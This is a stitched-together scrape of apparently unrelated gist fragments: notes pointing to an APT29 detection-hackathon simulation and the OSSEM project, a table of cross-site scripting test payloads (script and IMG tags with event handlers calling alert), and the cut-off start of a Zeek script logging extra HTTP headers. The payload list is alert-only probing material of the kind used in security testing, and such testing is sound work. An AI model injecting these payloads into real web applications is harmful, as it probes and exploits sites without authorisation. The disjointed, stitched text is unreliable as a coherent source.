based upon simulation from: https://github.com/OTRF/detection-hackathon-apt29
use the following OSSEM branch
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
based upon simulation from: https://github.com/OTRF/detection-hackathon-apt29
use the following OSSEM branch
what is the purpose of OSSEM? are we still aligning to this? https://github.com/hunters-forge/OSSEM#goals
| module HTTP; | |
| # Add additional HTTP Headers | |
| redef record Info += { | |
| #Refresh | |
| refresh: string &log &optional; | |
| #Accept-Language | |
| accept_language: string &log &optional; | |